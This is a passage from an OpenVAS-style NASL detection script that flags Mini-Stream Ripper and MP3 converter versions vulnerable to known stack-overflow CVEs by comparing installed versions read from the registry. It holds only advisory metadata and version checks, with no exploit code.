http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software 
Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will let the attacker craft malicious\n'asx' or 'ram' files and execute arbitrary codes to cause stack overflow in\nthe context of the affected application.\n\nImpact Level: Application\";\n\ntag_affected = \"Ripper version 3.0.1.1 (3.0.1.5) and prior\nRM-MP3 Converter version 3.0.0.7 and prior\nASXtoMP3 Converter version 3.0.0.7 and prior\";\n\ntag_insight = \"Inadequate boundary checks error of user supplied input to\nMini-stream products which causes stack overflow while processing .ram and\n.asx files with overly long URIs.\";\n\ntag_solution = \"No solution or patch was made available for at least one year\nsince disclosure of this vulnerability. 
Likely none will be provided anymore.\nGeneral solution options are to upgrade to a newer release, disable respective\nfeatures, remove the product or replace the product by another one.\";\n\ntag_summary = \"This host has Mini-Stream products installed and is prone to\nStack Overflow Vulnerability.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.900646\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-26 15:05:11 +0200 (Tue, 26 May 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2009-1642\", \"CVE-2009-1641\", \"CVE-2009-1645\");\n script_bugtraq_id(34864);\n script_name(\"Mini-Stream Multiple Products Stack Overflow Vulnerability\");\n script_xref(name : \"URL\" , value : \"http://www.milw0rm.com/exploits/8629\");\n script_xref(name : \"URL\" , value : \"http://www.milw0rm.com/exploits/8630\");\n script_xref(name : \"URL\" , value : \"http://www.milw0rm.com/exploits/8633\");\n script_xref(name : \"URL\" , value : \"http://www.milw0rm.com/exploits/8632\");\n script_xref(name : \"URL\" , value : \"http://www.milw0rm.com/exploits/8631\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/50374\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/50375\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/50376\");\n\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"secpod_mini_stream_prdts_detect.nasl\");\n script_mandatory_keys(\"MiniStream/Products/Installed\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : 
tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nrmMp3 = get_kb_item(\"MiniStream/RmToMp3/Conv/Ver\");\nif(rmMp3)\n{\n if(version_is_less_equal(version:rmMp3, test_version:\"3.0.0.7\"))\n {\n security_message(0);\n }\n}\n\nasxMp3 = get_kb_item(\"MiniStream/AsxToMp3/Conv/Ver\");\nif(asxMp3)\n{\n if(version_is_less_equal(version:asxMp3, test_version:\"3.0.0.7\"))\n {\n security_message(0);\n }\n}\n\nripper = get_kb_item(\"MiniStream/Ripper/Ver\");\nif(ripper)\n{\n #Ministream ripper 3.0.1.1 points to the version 3.0.1.5\n if(version_is_less_equal(version:ripper,test_version:\"3.0.1.5\"))\n {\n security_message(0);\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}